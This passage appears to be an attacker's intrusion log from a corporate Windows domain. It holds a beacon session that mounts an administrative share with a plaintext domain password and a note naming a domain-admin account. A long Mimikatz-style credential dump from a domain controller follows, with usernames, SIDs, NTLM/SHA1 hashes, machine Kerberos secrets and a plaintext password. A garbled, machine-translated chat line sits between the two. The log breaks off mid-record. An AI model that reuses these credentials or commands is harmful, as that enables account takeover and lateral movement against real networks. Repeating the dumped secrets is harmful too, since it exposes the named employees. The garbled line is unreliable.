Approximate round trip times in milli-seconds:
    Minimum = 28ms, Maximum = 28ms, Average = 28ms

beacon> shell net use \\10.222.0.100\c$ "MountainD3w!" /user:GlobalTranz.local\joel.reed
[*] Tasked beacon to run: net use \\10.222.0.100\c$ "MountainD3w!" /user:GlobalTranz.local\joel.reed
[+] host called home, sent: 105 bytes
[+] received output:
The command completed successfully.

``in two domains admin
GLOBALNET\joel.reed:MountainD3w!
``If there pdk not in azure - then you can) dsinkat?) do not) well hashdamnapat I will not pdknut I see hashes and kleer even see not 2008 so there pdk 12 serverpalets tired to moth))))) why are you so with me?

Authentication Id : 1 ; 2706300524 (00000001:a14ede6c)
Session : RemoteInteractive from 28
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/20/2020 11:05:54 PM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 2706300488 (00000001:a14ede48)
Session : RemoteInteractive from 28
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/20/2020 11:05:54 PM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 2344160807 (00000001:8bb90e27)
Session : RemoteInteractive from 26
User Name : ctrails
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/17/2020 8:50:33 AM
SID : S-1-5-21-498103351-3997332795-3100871051-5297
	msv :
	 [00000003] Primary
	 * Username : ctrails
	 * Domain : GLOBALNET
	 * NTLM : 5dccf338588af5e878393924440dd31b47
	 * SHA1 : 9d5cb5951028c851f4449ab582699851223ea290
	 [00010000] CredentialKeys
	 * NTLM : 5dccf338588af5e878393924440dd31b47
	 * SHA1 : 9d5cb5951028c851f4449ab582699851223ea290
	tspkg :
	wdigest :
	 * Username : ctrails
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ctrails
	 * Domain : GLOBALNET.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 1 ; 2344154206 (00000001:8bb8f45e)
Session : Interactive from 26
User Name : DWM-26
Domain : Window Manager
Logon Server : (null)
Logon Time : 11/17/2020 8:50:31 AM
SID : S-1-5-90-26
	msv :
	 [00000003] Primary
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * NTLM : 061a041b9645791509f4fe7527c3851a
	 * SHA1 : c6d6b0c66dc63f47d18d5ce8fa97f49afc4fdc0c
	tspkg :
	wdigest :
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ADC03-PHX01$
	 * Domain : globalnet.local
	 * Password : 9c 22 81 90 6a ae db 59 9f 6c 02 2c e1 c3 aa 75 de 25 d2 83 2c 57 5d 62 ce 06 54 c9 61 5f 04 37 d6 9e 11 1c eb 6c 99 16 67 04 07 42 be 92 cb 25 ac 48 2c 80 47 10 ed 88 61 16 e9 50 8c 55 99 07 a8 e1 fe fd 95 f3 19 87 1c 9d 2a 56 c1 51 24 29 8f a7 8c 96 89 e9 00 94 62 03 a0 bb 93 55 d1 2d 9f 8a 4e fd c1 85 e1 ef 21 3a 9c b1 32 8b b6 d3 a5 83 a6 09 f9 f3 0d 7d e1 84 db ff 68 ad 19 79 dd 83 2f 5b 46 07 67 4d f8 dc 4a fc f3 a4 4d b5 35 dc fe 91 b9 1f a0 7d 45 e1 16 aa 84 e5 84 77 f9 73 0f a6 be 41 b6 01 1d 5e 3e 2c 1e 7c a2 a8 7f 5e 70 d1 a8 14 93 99 48 da fd 90 31 f7 e5 d0 50 16 11 53 37 48 61 a6 63 21 bd 34 fa fe 95 47 c5 74 19 b7 8e 97 a9 59 41 c1 72 81 86 ec e1 be b8 1b fd 19 5b 16 1d ba e3 b0 c8 a8 28 2e d1 84
	ssp :
	credman :

Authentication Id : 1 ; 2344154166 (00000001:8bb8f436)
Session : Interactive from 26
User Name : DWM-26
Domain : Window Manager
Logon Server : (null)
Logon Time : 11/17/2020 8:50:31 AM
SID : S-1-5-90-26
	msv :
	 [00000003] Primary
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * NTLM : 12c4f1c0a7300d1f015d64e308229900
	 * SHA1 : ab62897a09ba3b99a035fbdfd87a6042126723d1
	tspkg :
	wdigest :
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ADC03-PHX01$
	 * Domain : globalnet.local
	 * Password : 1f 3b 55 c9 37 d0 65 91 a9 b0 99 dd 52 ad b9 71 68 a8 3a dd 2e 17 19 78 f3 9f ac ba 06 d5 c0 d7 b0 09 20 61 e3 b5 a0 05 a3 c4 a9 25 cf 81 70 59 d4 b1 de 69 b1 c8 59 93 58 47 47 d2 5d 1e de f7 99 78 0e 96 d2 da a7 53 51 b4 84 bd a6 fa e2 d4 0b 81 41 1d 5c c4 c1 6d d5 28 91 02 cd e2 ba 83 ef 66 0a f0 79 9b dd 61 e5 77 f0 c9 97 b2 b5 a9 f7 7b 54 12 2a 07 43 7a 02 0f 93 d3 75 63 f4 b3 92 9d 6c 0e 18 a1 36 93 3b 73 e0 e1 12 f2 f3 e7 43 42 7f a4 a2 d6 13 29 60 cf ed 31 b0 57 48 94 09 60 28 60 93 75 54 33 aa f4 a4 67 ee be 09 ae 60 fa db cd 1d 14 35 21 13 dd 78 f2 ee 8a ba d3 72 76 4b 65 92 8a a4 05 03 83 09 9f 5d 26 e1 a2 63 dc 96 7a 2a 54 d0 c6 25 38 93 32 33 7d 72 54 4d aa 41 f5 20 e7 6f 36 ff da c0 73 01 14 3f c5
	ssp :
	credman :

Authentication Id : 1 ; 1757521917 (00000001:68c1a7fd)
Session : RemoteInteractive from 25
User Name : g.boles
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/11/2020 9:12:31 AM
SID : S-1-5-21-498103351-3997332795-3100871051-15102
	msv :
	 [00000003] Primary
	 * Username : g.boles
	 * Domain : GLOBALNET
	 * NTLM : 2a7f47acb7457f80dbb0818577a7a79b
	 * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3
	 [00010000] CredentialKeys
	 * NTLM : 2a7f47acb7457f80dbb0818577a7a79b
	 * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3
	tspkg :
	wdigest :
	 * Username : g.boles
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : g.boles
	 * Domain : GLOBALNET.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 1 ; 1757518223 (00000001:68c1998f)
Session : Interactive from 25
User Name : DWM-25
Domain : Window Manager
Logon Server : (null)
Logon Time : 11/11/2020 9:12:30 AM
SID : S-1-5-90-25
	msv :
	 [00000003] Primary
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * NTLM : 061a041b9645791509f4fe7527c3851a
	 * SHA1 : c6d6b0c66dc63f47d18d5ce8fa97f49afc4fdc0c
	tspkg :
	wdigest :
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ADC03-PHX01$
	 * Domain : globalnet.local
	 * Password : 9c 22 81 90 6a ae db 59 9f 6c 02 2c e1 c3 aa 75 de 25 d2 83 2c 57 5d 62 ce 06 54 c9 61 5f 04 37 d6 9e 11 1c eb 6c 99 16 67 04 07 42 be 92 cb 25 ac 48 2c 80 47 10 ed 88 61 16 e9 50 8c 55 99 07 a8 e1 fe fd 95 f3 19 87 1c 9d 2a 56 c1 51 24 29 8f a7 8c 96 89 e9 00 94 62 03 a0 bb 93 55 d1 2d 9f 8a 4e fd c1 85 e1 ef 21 3a 9c b1 32 8b b6 d3 a5 83 a6 09 f9 f3 0d 7d e1 84 db ff 68 ad 19 79 dd 83 2f 5b 46 07 67 4d f8 dc 4a fc f3 a4 4d b5 35 dc fe 91 b9 1f a0 7d 45 e1 16 aa 84 e5 84 77 f9 73 0f a6 be 41 b6 01 1d 5e 3e 2c 1e 7c a2 a8 7f 5e 70 d1 a8 14 93 99 48 da fd 90 31 f7 e5 d0 50 16 11 53 37 48 61 a6 63 21 bd 34 fa fe 95 47 c5 74 19 b7 8e 97 a9 59 41 c1 72 81 86 ec e1 be b8 1b fd 19 5b 16 1d ba e3 b0 c8 a8 28 2e d1 84
	ssp :
	credman :

Authentication Id : 1 ; 1757518195 (00000001:68c19973)
Session : Interactive from 25
User Name : DWM-25
Domain : Window Manager
Logon Server : (null)
Logon Time : 11/11/2020 9:12:30 AM
SID : S-1-5-90-25
	msv :
	 [00000003] Primary
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * NTLM : 12c4f1c0a7300d1f015d64e308229900
	 * SHA1 : ab62897a09ba3b99a035fbdfd87a6042126723d1
	tspkg :
	wdigest :
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ADC03-PHX01$
	 * Domain : globalnet.local
	 * Password : 1f 3b 55 c9 37 d0 65 91 a9 b0 99 dd 52 ad b9 71 68 a8 3a dd 2e 17 19 78 f3 9f ac ba 06 d5 c0 d7 b0 09 20 61 e3 b5 a0 05 a3 c4 a9 25 cf 81 70 59 d4 b1 de 69 b1 c8 59 93 58 47 47 d2 5d 1e de f7 99 78 0e 96 d2 da a7 53 51 b4 84 bd a6 fa e2 d4 0b 81 41 1d 5c c4 c1 6d d5 28 91 02 cd e2 ba 83 ef 66 0a f0 79 9b dd 61 e5 77 f0 c9 97 b2 b5 a9 f7 7b 54 12 2a 07 43 7a 02 0f 93 d3 75 63 f4 b3 92 9d 6c 0e 18 a1 36 93 3b 73 e0 e1 12 f2 f3 e7 43 42 7f a4 a2 d6 13 29 60 cf ed 31 b0 57 48 94 09 60 28 60 93 75 54 33 aa f4 a4 67 ee be 09 ae 60 fa db cd 1d 14 35 21 13 dd 78 f2 ee 8a ba d3 72 76 4b 65 92 8a a4 05 03 83 09 9f 5d 26 e1 a2 63 dc 96 7a 2a 54 d0 c6 25 38 93 32 33 7d 72 54 4d aa 41 f5 20 e7 6f 36 ff da c0 73 01 14 3f c5
	ssp :
	credman :

Authentication Id : 1 ; 1683096831 (00000001:645204ff)
Session : RemoteInteractive from 24
User Name : jehad.jamalalldeen
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/10/2020 3:12:11 PM
SID : S-1-5-21-498103351-3997332795-3100871051-26749
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 1184016099 (00000001:4692a6e3)
Session : RemoteInteractive from 22
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/5/2020 7:30:15 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 4045964277 (00000000:f12883f5)
Session : RemoteInteractive from 17
User Name : ctrails2
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/20/2020 5:00:44 PM
SID : S-1-5-21-498103351-3997332795-3100871051-12967
	msv :
	 [00000003] Primary
	 * Username : ctrails2
	 * Domain : GLOBALNET
	 * NTLM : 5dccf338588af5e878393924440dd31b47
	 * SHA1 : 9d5cb5951028c851f4449ab582699851223ea290
	 [00010000] CredentialKeys
	 * NTLM : 5dccf338588af5e878393924440dd31b47
	 * SHA1 : 9d5cb5951028c851f4449ab582699851223ea290
	tspkg :
	wdigest :
	 * Username : ctrails2
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ctrails2
	 * Domain : GLOBALNET.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 3729906416 (00000000:de51daf0)
Session : RemoteInteractive from 15
User Name : jehad.jamalalldeen
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/14/2020 4:06:50 PM
SID : S-1-5-21-498103351-3997332795-3100871051-26749
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 3465255331 (00000000:ce8b99a3)
Session : Interactive from 14
User Name : DWM-14
Domain : Window Manager
Logon Server : (null)
Logon Time : 10/9/2020 1:34:11 PM
SID : S-1-5-90-14
	msv :
	 [00000003] Primary
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * NTLM : d9889c017ef3db77c8c91f2698b6b4d4
	 * SHA1 : 216b3dd017f9bb65cabc6230feef0a5da70be079
	tspkg :
	wdigest :
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ADC03-PHX01$
	 * Domain : globalnet.local
	 * Password : f0 3c 4a 64 58 23 0c 42 0a f3 de f1 0a a8 33 c7 b6 e1 85 af 81 5a be 1e 79 9a d1 91 57 45 13 c8 bf 75 16 3a 59 3b ac 5b 41 78 fd 83 01 32 62 21 6e 2e c8 64 26 2e 63 49 87 d8 10 80 65 a5 ad 53 57 1f 10 40 12 0b 5d 88 e1 64 3a 19 1b 1f b8 68 77 16 b9 a0 8d 6e b3 63 df a2 2f 24 cf cc 7c 3f ac 0c ed 17 68 0a 05 ec 49 99 02 20 60 84 6b 27 57 29 c0 9f a7 d8 2f c6 91 98 c1 4a c5 9a cb 5e bf 39 9f 04 40 54 84 3a cc 4e 97 7e 7a 77 63 b5 42 0b d9 3e dd 46 46 b5 5c 3a 69 73 4c 24 90 b2 a9 b7 d3 06 fc 68 0d eb 5a b3 b2 98 dc 37 d4 dc e2 6d 79 63 7e 64 cb 42 cc f6 b1 f6 8f d6 00 a4 9d 5f 75 79 bd c1 1b 9c ee a8 77 e1 2e d4 83 88 48 16 4d 53 aa b2 00 8f 1c d8 9c d1 c5 f3 1d 03 5a 51 d5 8d b5 7f fa 28 39 39 4a 0b a8 b4
	ssp :
	credman :

Authentication Id : 0 ; 3411885520 (00000000:cb5d3dd0)
Session : RemoteInteractive from 1
User Name : jehad.jamalalldeen
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/8/2020 3:00:26 PM
SID : S-1-5-21-498103351-3997332795-3100871051-26749
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 267352825 (00000000:0fef7af9)
Session : RemoteInteractive from 5
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 8/17/2020 4:09:01 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 2401291774 (00000001:8f20cdfe)
Session : RemoteInteractive from 27
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/17/2020 10:27:35 PM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 1757521866 (00000001:68c1a7ca)
Session : RemoteInteractive from 25
User Name : g.boles
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/11/2020 9:12:31 AM
SID : S-1-5-21-498103351-3997332795-3100871051-15102
	msv :
	 [00000003] Primary
	 * Username : g.boles
	 * Domain : GLOBALNET
	 * NTLM : 2a7f47acb7457f80dbb0818577a7a79b
	 * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3
	 [00010000] CredentialKeys
	 * NTLM : 2a7f47acb7457f80dbb0818577a7a79b
	 * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3
	tspkg :
	wdigest :
	 * Username : g.boles
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : g.boles
	 * Domain : GLOBALNET.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 1 ; 1650471032 (00000001:62603078)
Session : RemoteInteractive from 23
User Name : g.boles
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/10/2020 7:45:28 AM
SID : S-1-5-21-498103351-3997332795-3100871051-15102
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 532898358 (00000001:1fc36236)
Session : RemoteInteractive from 20
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/29/2020 7:38:19 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 532898318 (00000001:1fc3620e)
Session : RemoteInteractive from 20
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/29/2020 7:38:19 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 4045959632 (00000000:f12871d0)
Session : Interactive from 17
User Name : DWM-17
Domain : Window Manager
Logon Server : (null)
Logon Time : 10/20/2020 5:00:44 PM
SID : S-1-5-90-17
	msv :
	 [00000003] Primary
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * NTLM : d9889c017ef3db77c8c91f2698b6b4d4
	 * SHA1 : 216b3dd017f9bb65cabc6230feef0a5da70be079
	tspkg :
	wdigest :
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ADC03-PHX01$
	 * Domain : globalnet.local
	 * Password : f0 3c 4a 64 58 23 0c 42 0a f3 de f1 0a a8 33 c7 b6 e1 85 af 81 5a be 1e 79 9a d1 91 57 45 13 c8 bf 75 16 3a 59 3b ac 5b 41 78 fd 83 01 32 62 21 6e 2e c8 64 26 2e 63 49 87 d8 10 80 65 a5 ad 53 57 1f 10 40 12 0b 5d 88 e1 64 3a 19 1b 1f b8 68 77 16 b9 a0 8d 6e b3 63 df a2 2f 24 cf cc 7c 3f ac 0c ed 17 68 0a 05 ec 49 99 02 20 60 84 6b 27 57 29 c0 9f a7 d8 2f c6 91 98 c1 4a c5 9a cb 5e bf 39 9f 04 40 54 84 3a cc 4e 97 7e 7a 77 63 b5 42 0b d9 3e dd 46 46 b5 5c 3a 69 73 4c 24 90 b2 a9 b7 d3 06 fc 68 0d eb 5a b3 b2 98 dc 37 d4 dc e2 6d 79 63 7e 64 cb 42 cc f6 b1 f6 8f d6 00 a4 9d 5f 75 79 bd c1 1b 9c ee a8 77 e1 2e d4 83 88 48 16 4d 53 aa b2 00 8f 1c d8 9c d1 c5 f3 1d 03 5a 51 d5 8d b5 7f fa 28 39 39 4a 0b a8 b4
	ssp :
	credman :

Authentication Id : 0 ; 3751704402 (00000000:df9e7752)
Session : RemoteInteractive from 16
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/15/2020 1:35:54 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 3660849858 (00000000:da3422c2)
Session : RemoteInteractive from 13
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/13/2020 8:51:02 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 3288536418 (00000000:c4031562)
Session : Interactive from 12
User Name : DWM-12
Domain : Window Manager
Logon Server : (null)
Logon Time : 10/6/2020 10:44:36 AM
SID : S-1-5-90-12
	msv :
	 [00000003] Primary
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * NTLM : d9889c017ef3db77c8c91f2698b6b4d4
	 * SHA1 : 216b3dd017f9bb65cabc6230feef0a5da70be079
	tspkg :
	wdigest :
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ADC03-PHX01$
	 * Domain : globalnet.local
	 * Password : f0 3c 4a 64 58 23 0c 42 0a f3 de f1 0a a8 33 c7 b6 e1 85 af 81 5a be 1e 79 9a d1 91 57 45 13 c8 bf 75 16 3a 59 3b ac 5b 41 78 fd 83 01 32 62 21 6e 2e c8 64 26 2e 63 49 87 d8 10 80 65 a5 ad 53 57 1f 10 40 12 0b 5d 88 e1 64 3a 19 1b 1f b8 68 77 16 b9 a0 8d 6e b3 63 df a2 2f 24 cf cc 7c 3f ac 0c ed 17 68 0a 05 ec 49 99 02 20 60 84 6b 27 57 29 c0 9f a7 d8 2f c6 91 98 c1 4a c5 9a cb 5e bf 39 9f 04 40 54 84 3a cc 4e 97 7e 7a 77 63 b5 42 0b d9 3e dd 46 46 b5 5c 3a 69 73 4c 24 90 b2 a9 b7 d3 06 fc 68 0d eb 5a b3 b2 98 dc 37 d4 dc e2 6d 79 63 7e 64 cb 42 cc f6 b1 f6 8f d6 00 a4 9d 5f 75 79 bd c1 1b 9c ee a8 77 e1 2e d4 83 88 48 16 4d 53 aa b2 00 8f 1c d8 9c d1 c5 f3 1d 03 5a 51 d5 8d b5 7f fa 28 39 39 4a 0b a8 b4
	ssp :
	credman :

Authentication Id : 0 ; 3288536394 (00000000:c403154a)
Session : Interactive from 12
User Name : DWM-12
Domain : Window Manager
Logon Server : (null)
Logon Time : 10/6/2020 10:44:36 AM
SID : S-1-5-90-12
	msv :
	 [00000003] Primary
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * NTLM : 12c4f1c0a7300d1f015d64e308229900
	 * SHA1 : ab62897a09ba3b99a035fbdfd87a6042126723d1
	tspkg :
	wdigest :
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ADC03-PHX01$
	 * Domain : globalnet.local
	 * Password : 1f 3b 55 c9 37 d0 65 91 a9 b0 99 dd 52 ad b9 71 68 a8 3a dd 2e 17 19 78 f3 9f ac ba 06 d5 c0 d7 b0 09 20 61 e3 b5 a0 05 a3 c4 a9 25 cf 81 70 59 d4 b1 de 69 b1 c8 59 93 58 47 47 d2 5d 1e de f7 99 78 0e 96 d2 da a7 53 51 b4 84 bd a6 fa e2 d4 0b 81 41 1d 5c c4 c1 6d d5 28 91 02 cd e2 ba 83 ef 66 0a f0 79 9b dd 61 e5 77 f0 c9 97 b2 b5 a9 f7 7b 54 12 2a 07 43 7a 02 0f 93 d3 75 63 f4 b3 92 9d 6c 0e 18 a1 36 93 3b 73 e0 e1 12 f2 f3 e7 43 42 7f a4 a2 d6 13 29 60 cf ed 31 b0 57 48 94 09 60 28 60 93 75 54 33 aa f4 a4 67 ee be 09 ae 60 fa db cd 1d 14 35 21 13 dd 78 f2 ee 8a ba d3 72 76 4b 65 92 8a a4 05 03 83 09 9f 5d 26 e1 a2 63 dc 96 7a 2a 54 d0 c6 25 38 93 32 33 7d 72 54 4d aa 41 f5 20 e7 6f 36 ff da c0 73 01 14 3f c5
	ssp :
	credman :

Authentication Id : 0 ; 2087392566 (00000000:7c6b1536)
Session : RemoteInteractive from 11
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 9/16/2020 4:44:41 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 1983891629 (00000000:763fc8ad)
Session : RemoteInteractive from 10
User Name : g.boles
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 9/14/2020 1:20:20 PM
SID : S-1-5-21-498103351-3997332795-3100871051-15102
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 1638269509 (00000000:61a60245)
Session : RemoteInteractive from 9
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 9/8/2020 11:31:51 PM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 1217385810 (00000000:488fd552)
Session : RemoteInteractive from 8
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 9/1/2020 10:06:05 PM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 1217385774 (00000000:488fd52e)
Session : RemoteInteractive from 8
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 9/1/2020 10:06:05 PM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 267352861 (00000000:0fef7b1d)
Session : RemoteInteractive from 5
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 8/17/2020 4:09:01 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 116126204 (00000000:06ebf1fc)
Session : RemoteInteractive from 3
User Name : ctrails2
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 8/14/2020 12:53:22 PM
SID : S-1-5-21-498103351-3997332795-3100871051-12967
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 116126168 (00000000:06ebf1d8)
Session : RemoteInteractive from 3
User Name : ctrails2
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 8/14/2020 12:53:22 PM
SID : S-1-5-21-498103351-3997332795-3100871051-12967
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 1180840 (00000000:001204a8)
Session : RemoteInteractive from 2
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 8/12/2020 11:34:38 PM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : ADC03-PHX01$
Domain : GLOBALNET
Logon Server : (null)
Logon Time : 8/12/2020 11:30:50 PM
SID : S-1-5-18
	msv :
	tspkg :
	wdigest :
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : adc03-phx01$
	 * Domain : GLOBALNET.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 1 ; 3842484785 (00000001:e507aa31)
Session : Interactive from 0
User Name : g.boles
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 12/2/2020 12:01:27 AM
SID : S-1-5-21-498103351-3997332795-3100871051-15102
	msv :
	 [00010000] CredentialKeys
	 * NTLM : 2a7f47acb7457f80dbb0818577a7a79b
	 * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3
	 [00000003] Primary
	 * Username : g.boles
	 * Domain : GLOBALNET
	 * NTLM : 2a7f47acb7457f80dbb0818577a7a79b
	 * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3
	tspkg :
	wdigest :
	 * Username : g.boles
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : g.boles
	 * Domain : globalnet.local
	 * Password : Splat_9550!
	ssp :
	credman :

Authentication Id : 1 ; 2344160773 (00000001:8bb90e05)
Session : RemoteInteractive from 26
User Name : ctrails
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/17/2020 8:50:33 AM
SID : S-1-5-21-498103351-3997332795-3100871051-5297
	msv :
	 [00000003] Primary
	 * Username : ctrails
	 * Domain : GLOBALNET
	 * NTLM : 5dccf338588af5e878393924440dd31b47
	 * SHA1 : 9d5cb5951028c851f4449ab582699851223ea290
	 [00010000] CredentialKeys
	 * NTLM : 5dccf338588af5e878393924440dd31b47
	 * SHA1 : 9d5cb5951028c851f4449ab582699851223ea290
	tspkg :
	wdigest :
	 * Username : ctrails
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ctrails
	 * Domain : GLOBALNET.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 1 ; 1650471073 (00000001:626030a1)
Session : RemoteInteractive from 23
User Name : g.boles
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/10/2020 7:45:28 AM
SID : S-1-5-21-498103351-3997332795-3100871051-15102
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 1000286130 (00000001:3b9f27b2)
Session : RemoteInteractive from 21
User Name : jehad.jamalalldeen
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/3/2020 8:35:31 AM
SID : S-1-5-21-498103351-3997332795-3100871051-26749
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 1000286094 (00000001:3b9f278e)
Session : RemoteInteractive from 21
User Name : jehad.jamalalldeen
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/3/2020 8:35:31 AM
SID : S-1-5-21-498103351-3997332795-3100871051-26749
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 462032229 (00000001:1b8a0d65)
Session : RemoteInteractive from 19
User Name : ctrails
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/28/2020 1:54:05 PM
SID : S-1-5-21-498103351-3997332795-3100871051-5297
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 4281980067 (00000000:ff39d4a3)
Session : RemoteInteractive from 18
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
